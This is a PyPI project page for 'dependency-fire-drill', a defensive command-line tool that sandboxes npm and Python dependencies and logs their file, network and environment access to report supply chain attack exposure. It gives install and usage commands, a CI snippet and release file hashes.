Simulate supply chain attacks on your dependencies - see the blast radius before attackers do
Project description
dependency-fire-drill
Simulate supply chain attacks on your dependencies. See exactly what a compromised package can access.
What is this?
dependency-fire-drill is a security auditing CLI that sandboxes your project dependencies and logs their file system, network, and environment access attempts. It generates actionable "blast radius" reports showing the real attack surface of your dependency tree—helping you understand and mitigate supply chain attack risks before they happen.
Features
- Sandboxed execution – Isolates each dependency in a monitored runtime environment
- Comprehensive access logging – Tracks file system reads/writes, network connections, and environment variable access
- Multi-language support – Audits npm (JavaScript) and PyPI (Python) dependencies
- Blast radius reports – JSON and human-readable output showing attack surface per dependency
- CI/CD ready – GitHub Actions integration and machine-parseable output formats
- Zero-trust inspection – No assumptions; test what dependencies actually do, not what they claim
Quick Start
Installation
pip install dependency-fire-drill
Basic Usage
# Audit a Node.js project
dependency-fire-drill audit --package-json ./package.json --output report.json
# Audit a Python project
dependency-fire-drill audit --requirements ./requirements.txt --output report.json
# View a formatted report
dependency-fire-drill report --input report.json --format human
CI/CD Integration
Add to your GitHub Actions workflow:
- name: Run dependency fire drill
uses: your-org/dependency-fire-drill@v1
with:
package-file: package.json
fail-on-high: true
Usage Examples
Scan a single package:
dependency-fire-drill audit --package-json package.json
Generate a report with risk scoring:
dependency-fire-drill audit --package-json package.json \
--sandbox-timeout 30 \
--output blast-radius.json
Export for security dashboard:
dependency-fire-drill report --input blast-radius.json \
--format json \
--include-graph
The output includes:
- Per-dependency access logs (files, network IPs, env vars)
- Risk scores based on access patterns
- Dependency graph showing transitive risks
- Actionable recommendations
Tech Stack
- Language: Python 3.9+
- Sandboxing: OS-level process isolation with syscall monitoring
- Parsing: npm/PyPI manifest readers
- Output: JSON, human-readable text, CI integrations
License
MIT
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file dependency_fire_drill-0.1.0.tar.gz.
File metadata
- Download URL: dependency_fire_drill-0.1.0.tar.gz
- Upload date:
- Size: 13.0 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.9.25
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
9bb486782541b7516218d3f89dae5c2742dac64803e6f1d4e983a21d3688cd6d
|
|
| MD5 |
584802bdbe962b2bc17d2ad76a1a4641
|
|
| BLAKE2b-256 |
c4c0e7dbd8977e6a20bbd9cb16012b52a7705f09406b3bbd6d1e91a63c495860
|
File details
Details for the file dependency_fire_drill-0.1.0-py3-none-any.whl.
File metadata
- Download URL: dependency_fire_drill-0.1.0-py3-none-any.whl
- Upload date:
- Size: 13.1 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.9.25
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
c76372dd0e37c22d148736fd47a9d7b33a51d3a88dab5c12894c483ae63b561b
|
|
| MD5 |
e53c3f17a46cc8b93a426284b00bb836
|
|
| BLAKE2b-256 |
31b411156778483ff080d043f2d2cec6f2631f20c9fef8817076a46ccbef8c6f
|
